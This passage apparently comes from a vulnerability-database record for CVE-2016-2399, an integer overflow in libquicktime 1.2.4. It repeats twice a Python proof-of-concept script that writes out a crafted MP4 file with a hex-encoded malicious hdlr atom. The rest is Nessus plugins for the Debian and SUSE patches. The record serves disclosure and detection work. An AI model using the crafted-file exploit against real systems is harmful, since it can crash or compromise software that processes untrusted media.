something\r\n#\r\n#### \r\nimport sys\r\nimport struct\r\nimport binascii\r\n\r\n\"\"\"\r\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\r\nmoov -> trak -> mdia -> hdlr\r\n\"\"\"\r\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \r\n \"6D6F6F76\" #### moov atom\r\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \r\n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\r\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\r\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \r\n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \r\n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \r\n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\r\n \"7472616B\" #### trak atom\r\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\r\n \"6D646961\" #### mdia atom\r\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\r\n \"4E\" #### hdlr atom length\r\n \"68646C72\" #### hdlr atom\r\n \"0000000000\"\r\n \"4141414141414141\" #### our airstrip :)\r\n \"0000000000000000000000\" \r\n \"EC\" #### 236 > 127 <-- overflow here and a change in signedness too\r\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\r\n\r\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\r\n\r\ndef createPoC():\r\n try:\r\n with open(\"./nemux.mp4\",\"wb\") as output:\r\n output.write(hax0r_mp4)\r\n print \"[*] The PoC is done!\"\r\n except Exception,e: \r\n print str(e)\r\n print \"[*] mmmm!\"\r\n\r\ndef usage():\r\n print \"\\nUsage? Run it -> \" + sys.argv[0]\r\n print \"this poc creates an mp4 file named nemux.mp4\"\r\n print \"--------------------------------------------\"\r\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\" \r\n sys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n if len(sys.argv) == 2:\r\n usage()\r\n else:\r\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\r\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\r\n createPoC();\r\n except Exception,e: \r\n print str(e)\r\n print \"Ok... Something went wrong...\"\r\n sys.exit()\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39487/"}], "zdt": [{"lastseen": "2018-03-13T16:12:29", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-23T00:00:00", "type": "zdt", "title": "libquicktime 1.2.4 - Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "href": "https://0day.today/exploit/description/25845", "id": "1337DAY-ID-25845", "sourceData": "#!/usr/bin/env python\r\n#\r\n###\r\n# - 7 February 2016 -\r\n# My last bug hunting session (*for fun and no-profit*) \r\n# has been dedicated to libquicktime\r\n###\r\n# \r\n# Author: Marco Romano - @nemux_ http://www.nemux.org\r\n# libquicktime 1.2.4 Integer Overflow\r\n#\r\n# Product Page: http://libquicktime.sourceforge.net/\r\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\r\n# Affected products: All products using libquicktime version <= 1.2.4\r\n#\r\n# CVE-ID: CVE-2016-2399 \r\n#\r\n# Disclosure part: http://www.nemux.org\r\n#\r\n########\r\n####### Timeline\r\n#\r\n# 07 Feb 2016 Bug discovered\r\n# 17 Feb 2016 Mitre.org contacted\r\n# 17 Feb 2016 Disclosed to the project's maintainer\r\n# 23 Feb 2016 No response from the maintainer\r\n# 23 Feb 2016 Publicly disclosed \r\n#\r\n########\r\n####### References\r\n#\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\r\n# http://libquicktime.sourceforge.net/\r\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \r\n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\r\n#\r\n#######\r\n#\r\n# DISCLAIMER: It's just a PoC... it will crash something\r\n#\r\n#### \r\nimport sys\r\nimport struct\r\nimport binascii\r\n \r\n\"\"\"\r\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\r\nmoov -> trak -> mdia -> hdlr\r\n\"\"\"\r\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\"\r\n \"6D6F6F76\" #### moov atom\r\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\"\r\n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\r\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\r\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\"\r\n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\"\r\n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\"\r\n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\r\n \"7472616B\" #### trak atom\r\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\r\n \"6D646961\" #### mdia atom\r\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\r\n \"4E\" #### hdlr atom length\r\n \"68646C72\" #### hdlr atom\r\n \"0000000000\"\r\n \"4141414141414141\" #### our airstrip :)\r\n \"0000000000000000000000\"\r\n \"EC\" #### 236 > 127 <-- overflow here and a change in signedness too\r\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\r\n \r\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\r\n \r\ndef createPoC():\r\n try:\r\n with open(\"./nemux.mp4\",\"wb\") as output:\r\n output.write(hax0r_mp4)\r\n print \"[*] The PoC is done!\"\r\n except Exception,e: \r\n print str(e)\r\n print \"[*] mmmm!\"\r\n \r\ndef usage():\r\n print \"\\nUsage? Run it -> \" + sys.argv[0]\r\n print \"this poc creates an mp4 file named nemux.mp4\"\r\n print \"--------------------------------------------\"\r\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\"\r\n sys.exit()\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n if len(sys.argv) == 2:\r\n usage()\r\n else:\r\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\r\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\r\n createPoC();\r\n except Exception,e: \r\n print str(e)\r\n print \"Ok... Something went wrong...\"\r\n sys.exit()\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/25845", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T09:44:19", "description": "Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-01T00:00:00", "title": "Debian DLA-844-1 : libquicktime security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:quicktime-x11utils", "p-cpe:/a:debian:debian_linux:libquicktime2", "p-cpe:/a:debian:debian_linux:quicktime-utils", "p-cpe:/a:debian:debian_linux:libquicktime-doc", "p-cpe:/a:debian:debian_linux:libquicktime-dev", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-844.NASL", "href": "https://www.tenable.com/plugins/nessus/97441", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-844-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97441);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"Debian DLA-844-1 : libquicktime security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libquicktime\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:quicktime-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:quicktime-x11utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime-dev\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime-doc\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime2\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"quicktime-utils\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"quicktime-x11utils\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:26:05", "description": "This update for libquicktime fixes the following issues: Security\nissue fixed :\n\n - CVE-2016-2399: Adjust patch to prevent endless loop when\n there are less than 256 bytes to read. (bsc#1022805)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:1986-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-07-31T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libquicktime-debugsource", "p-cpe:/a:novell:suse_linux:libquicktime0", "p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo"], "id": "SUSE_SU-2017-1986-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1986-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102066);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:1986-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues: Security\nissue fixed :\n\n - CVE-2016-2399: Adjust patch to prevent endless loop when\n there are less than 256 bytes to read. (bsc#1022805)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2399/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171986-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?36313e4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1229=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:25:32", "description": "This update for libquicktime fixes the following issues :\n\n - A crafted MP4 file could have caused libquicktime to\n crash or lead to undefined behaviour (bsc#1022805,\n CVE-2016-2399)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:0610-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-07T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libquicktime-debugsource", "p-cpe:/a:novell:suse_linux:libquicktime0", "p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo"], "id": "SUSE_SU-2017-0610-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97572", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0610-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97572);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:0610-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues :\n\n - A crafted MP4 file could have caused libquicktime to\n crash or lead to undefined behaviour (bsc#1022805,\n CVE-2016-2399)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2399/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170610-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b155abf5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-326=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-326=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-326=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) 